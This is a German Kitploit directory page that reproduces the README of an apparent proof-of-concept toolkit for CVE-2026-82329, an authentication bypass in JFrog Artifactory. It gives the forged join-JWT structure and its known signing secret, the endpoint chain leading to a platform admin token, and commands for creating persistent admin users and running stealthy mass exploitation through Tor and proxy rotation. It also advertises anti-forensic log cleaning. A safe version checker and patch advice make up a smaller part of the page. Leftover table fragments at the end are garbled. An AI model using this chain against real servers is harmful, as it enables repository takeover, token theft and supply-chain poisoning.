Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-82329-PoC-Exploit — Exploit- und Erkennungs-Toolkit für CVE-2026-82329, einen JFrog Artifactory Auth-Bypass. Fälscht Join-JWTs, um Admin-Token zu erzeugen; enthält einen nicht-intrusiven Versionsprüfer. | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
DefensivwerkzeugeSchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationInformationsbeschaffungSicherheitsvirtualisierungPenetrationstestsAuthentifizierung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Red Teaming
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

Exploit- und Erkennungs-Toolkit für CVE-2026-82329, einen JFrog Artifactory Auth-Bypass. Fälscht Join-JWTs, um Admin-Token zu erzeugen; enthält einen nicht-intrusiven Versionsprüfer.

Repository anzeigen
vor 11h 31mNoch nicht geprüft
Teilen

CVEPoC

CVE‑2026‑82329 – JFrog Artifactory Auth-Bypass-Toolkit

Python 3.8+ CVSS Author Artifactory

NUR FÜR ETHISCHE NUTZUNG – AUTORISIERTE SICHERHEITSTESTS Dieses Repository stellt Tools ausschließlich für autorisierte Sicherheitsexperten, Blue Teams und Penetrationstester bereit. Unbefugter Zugriff auf Computersysteme ist illegal gemäß CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Türkei) und ähnlichen Gesetzen weltweit.


📖 Schwachstellenübersicht

CVE‑2026‑82329 ist eine kritische Authentifizierungs-Bypass-Schwachstelle in (Versionen bis ), die es einem nicht authentifizierten Angreifer ermöglicht, durch Ausnutzung des JFrog Access Cluster-Join-Mechanismus ein zu erlangen.

selbst gehostetem JFrog Artifactory
7.111.x
7.161.x
vollständiges Plattform-Administrator-Token

Funktionsweise

  1. Vertrauen in leeren Join-Key – JFrog Access vertraut einem Phantom-Join-Key, dessen Wert eine leere Zeichenkette ist. Sein Signaturgeheimnis ist daher der deterministische Wert 32 * 0x20 (Leerzeichen).
  2. Gefälschtes Join-JWT – ein Angreifer fälscht ein HS256-JWT, das mit diesem bekannten Geheimnis und kid = SHA256("") signiert ist.
  3. SERVICE-Token ausgestellt – POST /access/api/v1/registry/join gibt ohne jegliche Authentifizierung ein SERVICE-Token mit scp=admin zurück.
  4. Admin-Token-Austausch – POST /access/api/v1/tokens mit scope=applied-permissions/admin&audience=* liefert ein vollständiges Plattform-Admin-Token.
  5. Auswirkung – vollständige Übernahme des Repositorys, Token-Diebstahl, Erstellung von Admin-Benutzern, Artefakt-Vergiftung, Supply-Chain-Angriffe und laterale Bewegung in verbundene Dienste (Xray, Mission Control, Distribution). Sofort aktualisieren!

Betroffene Versionen

  • 7.111.4 – 7.111.20 – anfällig
  • 7.117.0 – 7.117.27 – anfällig
  • 7.125.0 – 7.125.19 – anfällig
  • 7.133.0 – 7.133.28 – anfällig
  • 7.146.0 – 7.146.36 – anfällig
  • 7.161.0 – 7.161.19 – anfällig

Patch

  • Aktualisieren Sie auf 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38 oder 7.161.20 oder neuer.
  • Falls ein Upgrade nicht möglich ist, beschränken Sie den Netzwerkzugriff auf Artifactory (setzen Sie es niemals dem Internet aus) und rotieren Sie alle Admin-Token als vorübergehende Problemumgehung.

🧰 Tools

ToolZweckVorgesehener Benutzer
exploit.pyVollständiges weaponisiertes Toolkit mit JWT-Fälschung, Admin-Token-Austausch, Erstellung von Admin-Benutzern, Massen-Scanning, Stealth-Modus, Proxy-Rotation, interaktivem Menü und vollständiger Angriffskette.Red Teams / autorisierte Pentester
safechecker.pyNicht-intrusiver Schwachstellen-Checker, der die Artifactory-Version erkennt, die Exposition validiert und das Risiko bewertet, ohne ein Token zu erhalten oder eine Payload auszuführen. Erzeugt JSON-Berichte.Blue Teams / Sicherheitsauditoren

📊 Funktionsvergleich

Funktionexploit.pysafechecker.py
Schwachstellenerkennung✅✅
Versionserkennung✅✅
Gefälschtes Join-JWT✅❌
Service-Token-Ausstellung✅❌
Admin-Token-Austausch✅❌
Erstellung von Admin-Benutzern✅❌
Repositories auflisten✅❌
Benutzer auflisten✅❌
Konfiguration auslesen✅❌
Token auslesen✅❌
Vollständige Angriffskette✅❌
Interaktives Menü✅❌
Massen-Scanning (Multi-Thread)✅✅
Proxy-Unterstützung✅✅
Proxy-Rotation✅❌
Tor-Unterstützung (Anonymität)✅❌
User-Agent-Rotation (OPSEC)✅❌
Jitter (OPSEC)✅❌
Adaptiver Rate-Limiter✅❌
Nicht-intrusiver (sicherer) Modus❌✅
Versionsbericht✅✅
Anonymer Zugriffscheck❌✅
JSON-Bericht✅

🎯 Zusammenfassung der Anwendungsfälle

SzenarioEmpfohlenes Tool
Blue Team – Überprüfung, ob Ihr Artifactory anfällig istsafechecker.py
Sicherheitsaudit – nicht-intrusive Schwachstellenbewertungsafechecker.py
Red Team – autorisierte Penetrationstests mit vollständiger Ausnutzungexploit.py
Bug Bounty – Tests zur verantwortungsvollen Offenlegungsafechecker.py
Massen-Scanning – Überprüfung mehrerer Ziele auf Schwachstellenexploit.py (nur Erkennung)
Incident Response – Überprüfung, ob Systeme kompromittiert wurdensafechecker.py

⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 Parameter

exploit.py Parameter

ParameterBeschreibung
-u, --urlEinzelne Ziel-Artifactory-URL (z. B. http://artifactory.example.com:8082)
-f, --fileDatei mit Zielliste (eine pro Zeile) für Massen-Scanning
--create-adminPersistenten Admin-Benutzer erstellen (Format: USER:PASS)
--keep-adminErstellten Admin-Benutzer behalten (keine Bereinigung nach dem Scan)
--token-onlyNur Admin-Token ausgeben (einzelnes Ziel)
--interactiveInteraktives Menü nach der Ausnutzung
--service-idService-ID für Join-JWT (Standard: jfrt@01)
-t, --threadsAnzahl der Threads für mehrere Ziele (Standard: 10)
--timeoutAnfrage-Timeout (Standard: 25s)
--retryMaximale Wiederholungsversuche (Standard: 3)
--proxyHTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080)
--proxy-listDatei mit Proxys für Rotation (eine pro Zeile)
--jitterZufälliger Jitter (0-2 Sek.) zwischen Anfragen
--stealthStealth-Modus aktivieren (UA-Rotation + X-Forwarded-For)
--curl-cfficurl_cffi für TLS-Fingerprint-Impersonation verwenden
--fullVollständiger Angriff: alle Module
--dump-configSystemkonfiguration auslesen
--dump-tokensAlle Zugriffstoken auslesen
--list-reposRepositories auflisten
--list-usersBenutzer auflisten
--detect

safechecker.py Parameter

ParameterBeschreibung
-u, --urlEinzelne Ziel-Artifactory-URL (z. B. http://artifactory.example.com:8082)
-f, --fileDatei mit Zielliste (eine pro Zeile)
-t, --threadsAnzahl der Threads für mehrere Ziele (Standard: 5)
--timeoutAnfrage-Timeout (Standard: 10s)
-v, --verboseAusführliche Ausgabe
-o, --outputJSON-Bericht in Datei speichern

💥 Szenarien

#SzenarioBefehl
1Schnelle Schwachstellenprüfungpython safechecker.py -u http://artifactory.example.com:8082
2Detaillierter Scan mit Berichtpython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3Massen-Audit aus Dateipython safechecker.py -f targets.txt -t 10 -o audit.json
4Nur-Erkennungs-Exploitpython exploit.py -u http://artifactory.example.com:8082 --detect
5Nur Admin-Token abrufenpython exploit.py -u http://artifactory.example.com:8082 --token-only
6Vollständiger Angriff mit interaktivem Menüpython exploit.py -u http://artifactory.example.com:8082 --interactive
7Persistenten Admin-Benutzer erstellenpython exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8Konfiguration auslesenpython exploit.py -u http://artifactory.example.com:8082 --dump-config
9Repositories und Benutzer auflistenpython exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10Massen-Exploit mit Stealthpython exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11Proxy-Rotation mit Torpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth

🧪 Endpunkt- und Ausnutzungskette

Der Exploit verwendet die folgenden JFrog-Endpunkte und Ausnutzungsschritte:

SchrittMethodeEndpunktBeschreibung
1. JoinPOST/access/api/v1/registry/joinGefälschtes HS256-JWT → SERVICE-Token (scp=admin)
2. ExchangePOST/access/api/v1/tokensSERVICE-Token → Plattform-Admin-Token
3. ProveGET/artifactory/api/system/configurationNur-Admin-Zugriffsnachweis
4. PersistPUT/artifactory/api/security/users/{user}Persistenten Admin-Benutzer erstellen
5. RevokeDELETE/access/api/v1/tokens/{id}Erstellte Token bereinigen

Payload-Format

root@kitploit:~
# Struktur des gefälschten Join-JWT
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# Signaturgeheimnis
secret = b"\x20" * 32

# Admin-Token-Anfrage
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ Verantwortungsvolle Nutzung

  • Verwenden Sie diese Tools nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Unbefugter Zugriff ist illegal und unethisch.
  • Die Autoren sind nicht für jeglichen Missbrauch verantwortlich.
  • Befolgen Sie stets die Gesetze und Vorschriften Ihres Landes.

Diese Software wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Tool herunterladen
✅
Log-Bereinigung (Anti-Forensik)✅❌
Benutzerdefinierter User-Agent✅✅
SSL-Verifizierungssteuerung✅✅
Nur Erkennung (kein Admin-Token-Austausch)
--exploitVollständige Ausnutzung durchführen
-o, --outputJSON-Bericht in Datei speichern
-v, --verboseAusführliche Ausgabe
-q, --quietLeiser Modus